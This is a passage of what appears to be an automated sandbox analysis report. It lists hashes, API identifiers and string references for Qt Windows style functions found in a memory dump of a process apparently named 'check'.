                                                                                                                                                                                                                • Instruction ID: 825ba3681d4703f134d0c0652c364c15f2b8295a819b02cfa4289fcf11b39fde
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b0eb25a1c4768a36c89c632dd192c36ef1802a751325b595f53e885af238b3a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF031B26092418BD721CF15E04462BFBB1FB8AB65F408126DB9E87BA4DB7DE444CF50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$Style@@$?dpi?native?proxy@?visualDirection@Factor@Helper@@LayoutMetricMetricsOption@@@Private@@Qt@@Rect@Rect@@ScaleScaled@SystemV2@1@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2703714581-0
                                                                                                                                                                                                                • Opcode ID: dbf102684acb2a35d77de8a41d66fa1a966b1780541249f278a0e1e1a69d8e28
                                                                                                                                                                                                                • Instruction ID: 086696c4fffb85767da00da0ff73c9b94b84130a29d3cf6f73991ceff32645fd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbf102684acb2a35d77de8a41d66fa1a966b1780541249f278a0e1e1a69d8e28
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21510832E24B454AE3178B349510ABD7760BF5A3A8F048337DD2D67B95FF38A9828750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$Style@@$?dpi?proxy@Helper@@Icon@@Option@@@Scaled@$?actual?native?visualDirection@Factor@LayoutMetricMetricsMode@1@Null@Private@@Qt@@Rect@Rect@@ScaleSize@Size@@State@1@@SystemV2@1@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1348229865-0
                                                                                                                                                                                                                • Opcode ID: a3a81ee1444c570ce97493a3856bb4b45ab03090b5636d75ca0cf013feeb59b3
                                                                                                                                                                                                                • Instruction ID: 1f7e8493a4bdb9a3efa6a7fcc87880530ed09ee2ac3b3abb5b78fc4db1925954
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3a81ee1444c570ce97493a3856bb4b45ab03090b5636d75ca0cf013feeb59b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD510932E24B454AE3178B3495106AD7770BF5A3A8F009337DE1E67B95EF38A582C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$Style@@$?dpi?proxy@Helper@@Icon@@Option@@@Scaled@$?actual?native?visualDirection@Factor@LayoutMetricMetricsMode@1@Null@Private@@Qt@@Rect@Rect@@ScaleSize@Size@@State@1@@SystemV2@1@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1348229865-0
                                                                                                                                                                                                                • Opcode ID: 92dbdda0d19150f172894aa8529fe5b9dca4c4ee5a55af368a3bf8d58b04aecb
                                                                                                                                                                                                                • Instruction ID: 023271c7af7826961a9d587bc62bb4b5949c5ed9c8e163c243984189e6a425e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92dbdda0d19150f172894aa8529fe5b9dca4c4ee5a55af368a3bf8d58b04aecb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B510A32E24B454AE3178B34D5106AD7770BF5A3A8F009337DE2D67B95EF38A5828750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$Style@@$?dpi?proxy@Helper@@Icon@@Option@@@Scaled@$?actual?native?visualDirection@Factor@LayoutMetricMetricsMode@1@Null@Private@@Qt@@Rect@Rect@@ScaleSize@Size@@State@1@@SystemV2@1@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1348229865-0
                                                                                                                                                                                                                • Opcode ID: 235c43077833881dada65853207776c9654463005349dfaa767bd7c6d800e36a
                                                                                                                                                                                                                • Instruction ID: 241652184d2c95b0d8b24da142bdeffe29d46d5a1400681f9f2ba8b24599dafc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 235c43077833881dada65853207776c9654463005349dfaa767bd7c6d800e36a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B510A32E24B454AE3178B34D5106AD7770BF5A3A8F009337DD2D67B95EF38A5828750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$Style@@$?dpi?proxy@Helper@@Icon@@Option@@@Scaled@$?actual?native?visualDirection@Factor@LayoutMetricMetricsMode@1@Null@Private@@Qt@@Rect@Rect@@ScaleSize@Size@@State@1@@SystemV2@1@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1348229865-0
                                                                                                                                                                                                                • Opcode ID: 5c93e4daa3e7bf6dc4c7b63fc9b65a718e5ca28d33c1ee4e6f2ab8c2bce94f12
                                                                                                                                                                                                                • Instruction ID: 35d450e16e900810f69cc19e3b920c79466816a0da5c31ef89ca77384e85dc46
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c93e4daa3e7bf6dc4c7b63fc9b65a718e5ca28d33c1ee4e6f2ab8c2bce94f12
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD510932E24B454AE3178B34D5106AD7770BF5A3A8F009337DD2E67B95EF38A9828750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$Style@@$?dpi?proxy@Helper@@Icon@@Option@@@Scaled@$?actual?native?visualDirection@Factor@LayoutMetricMetricsMode@1@Null@Private@@Qt@@Rect@Rect@@ScaleSize@Size@@State@1@@SystemV2@1@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1348229865-0
                                                                                                                                                                                                                • Opcode ID: 4f254d19086d8d266ba6612c19877a3d4a4834cdacfc6c2eb901b757e0a6010e
                                                                                                                                                                                                                • Instruction ID: 0b143b3a742f1960e245dbf1b8b1121d38302a25e5f7fa4ecba7c7a2d427efb7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f254d19086d8d266ba6612c19877a3d4a4834cdacfc6c2eb901b757e0a6010e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38510932E24B454AE3178B34D5106AD7770BF5A3A8F009337DD2E67B95EF38A9828750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$Style@@$?dpi?proxy@Helper@@Icon@@Option@@@Scaled@$?actual?native?visualDirection@Factor@LayoutMetricMetricsMode@1@Null@Private@@Qt@@Rect@Rect@@ScaleSize@Size@@State@1@@SystemV2@1@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1348229865-0
                                                                                                                                                                                                                • Opcode ID: 2845a8533e8df527e984989391ab918029d3512c98f6bf39dc46ea44de1abd51
                                                                                                                                                                                                                • Instruction ID: f026071999e2f70c209cec62402c0b4b08bd18d19b51d74cbba691c219be7c02
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2845a8533e8df527e984989391ab918029d3512c98f6bf39dc46ea44de1abd51
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9510732E24B414AE3178B3495106AD7770BF6A3A8F008337DD1E67B95EF38A982C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Region@@$?proxy@Rect@@@Style@@V0@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 109746496-0
                                                                                                                                                                                                                • Opcode ID: 31413f8722f415f69d241d847c1202c6200de1bc14da44b92c43a3a42d38f5f7
                                                                                                                                                                                                                • Instruction ID: 65143e97805c92021343d4a175c75e26eed33a6a2a0cb45b3fc8fb0c9c938cbb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31413f8722f415f69d241d847c1202c6200de1bc14da44b92c43a3a42d38f5f7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35419632A08681CAF722CFA9D4516ED73B0FB55759F04412ACF6D17B98EF78A08AC750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Color@@$Region@@$?color@?darker@?rgba@ColorPalette@@Role@1@@V0@$$V0@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3073303128-0
                                                                                                                                                                                                                • Opcode ID: 083ac9b8e9d0436a9824d5e95df16459f6d0e5a2eae8ea34c9ee34304385b824
                                                                                                                                                                                                                • Instruction ID: 10fc1516137ce9db61bec4939717bb41bbe9e92b317f8daece4a5764bbdaa615
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 083ac9b8e9d0436a9824d5e95df16459f6d0e5a2eae8ea34c9ee34304385b824
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9031A332A28682A2E7628B14EA4473973A4FB4B761F508137DA7D0B7D5EF3CD5448B60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MetricsSystem$Type@$?windowQt@@Widget@@Window
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2319562268-0
                                                                                                                                                                                                                • Opcode ID: eccd0519a76be9a3549f9c89e57b5d0e1061defe8747151b59ab9564d9307f31
                                                                                                                                                                                                                • Instruction ID: e97cce47a232dfa0f0093dcd45f6929378176411a829972f8247f849b3945bf9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eccd0519a76be9a3549f9c89e57b5d0e1061defe8747151b59ab9564d9307f31
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79F06865F04B4186E7518B74D854A3822A1FF0A756F844031CA3D8B3D1EF2DDC49C3A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Widget@@$?inherits@?parentObject@@Widget@Window@
                                                                                                                                                                                                                • String ID: QDockWidgetTitleButton
                                                                                                                                                                                                                • API String ID: 3564839902-3136866964
                                                                                                                                                                                                                • Opcode ID: 9aa2cbc1db5db814ef08e42b48be501830d88e022c2302b09222816bfceb17e5
                                                                                                                                                                                                                • Instruction ID: 93751414013a4f06bc41a59dd92657c61b601213fed2ae135d1aee8a0a9e8865
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9aa2cbc1db5db814ef08e42b48be501830d88e022c2302b09222816bfceb17e5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF117523A0D54280FB13CB559814BB92351AFCA775F458237CE7E0F2D0EE3DA88683A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?property@Bool@Object@@
                                                                                                                                                                                                                • String ID: _q_no_animation
                                                                                                                                                                                                                • API String ID: 1823291034-1968374880
                                                                                                                                                                                                                • Opcode ID: 715d00d2ce1d96b3c694a3cfaa105a256cdd9f024003b2585b533b3e311c8831
                                                                                                                                                                                                                • Instruction ID: 275255507fbd8a276a3759d42a696e8b1ce80c612ef41efc6ef68f74bf6bfd4a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 715d00d2ce1d96b3c694a3cfaa105a256cdd9f024003b2585b533b3e311c8831
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F06822E1D60286EB618B52F4509797370FF47751F94813BDA7E0A6E0EF3DD44587A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Data@@Hash$?allocate?detach_helper@?free_helper@?rehash@Node@Node@1@Node@1@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3923398785-0
                                                                                                                                                                                                                • Opcode ID: 863c7a1c72af95c9c2265efe2a7774039b581fb404593c285ea37a4391ece2c8
                                                                                                                                                                                                                • Instruction ID: 0be6b6348f38ab1c355260ede77151adf627bc73a02b2e9db1c5fc1a5237dcf4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 863c7a1c72af95c9c2265efe2a7774039b581fb404593c285ea37a4391ece2c8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40517F33A08A4586DB51CF16D44046E7BA0FB8AFA5B19C132DE3D8B390EF38E951C790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Rect@@Style@@$?adjusted@?proxy@?visualDirection@LayoutMarginsQt@@Rect@ThemeV2@1@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1523045187-0
                                                                                                                                                                                                                • Opcode ID: 1c5b7769c8eaa51b52e61759b5eded3c703c6f46be1d6aeac07fe474e12bb27a
                                                                                                                                                                                                                • Instruction ID: a817969cbcac782226230b25e82b4cf30f13cf6f0ae14f8fefaabb1a3e546f17
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c5b7769c8eaa51b52e61759b5eded3c703c6f46be1d6aeac07fe474e12bb27a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F41A632A08B818BE752CF25E4406AA73A0F796765F508136EB6D47A94EF7CE491CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?adjusted@Rect@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 132019423-0
                                                                                                                                                                                                                • Opcode ID: 8878f415615fb766ad72a2b929c7ee8e3dfd823e13b256f5d78cf4328985a9f6
                                                                                                                                                                                                                • Instruction ID: 7fbf56e9454bcc17e6410dc3497eed58e3accbb4d8cd25024ad3bb3428e74d65
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8878f415615fb766ad72a2b929c7ee8e3dfd823e13b256f5d78cf4328985a9f6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45515332818BD18AE3228F3CD8056E87770FB5976CF145315EEA916AA9EB3992C1C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsThemeActive.UXTHEME(?,?,?,?,00007FFAFDF1131D), ref: 00007FFAFDF2155E
                                                                                                                                                                                                                • IsAppThemed.UXTHEME(?,?,?,?,00007FFAFDF1131D), ref: 00007FFAFDF21568
                                                                                                                                                                                                                • ?instance@QCoreApplication@@SAPEAV1@XZ.QT5CORE(?,?,?,?,00007FFAFDF1131D), ref: 00007FFAFDF21572
                                                                                                                                                                                                                • ?isDarkMode@QWindowsStylePrivate@@SA_NXZ.QT5WIDGETS(?,?,?,?,00007FFAFDF1131D), ref: 00007FFAFDF2157D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?instance@ActiveApplication@@CoreDarkMode@Private@@StyleThemeThemedWindows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1911171430-0
                                                                                                                                                                                                                • Opcode ID: 46f76d0cdb2f54ed596c47a7961187234bede8d86bf7312b80ea52cd76aa292f
                                                                                                                                                                                                                • Instruction ID: d625887a908f4a912c9daa1720e4ef94d60c00309e5ba98e9df7ce7c8c4a95e1
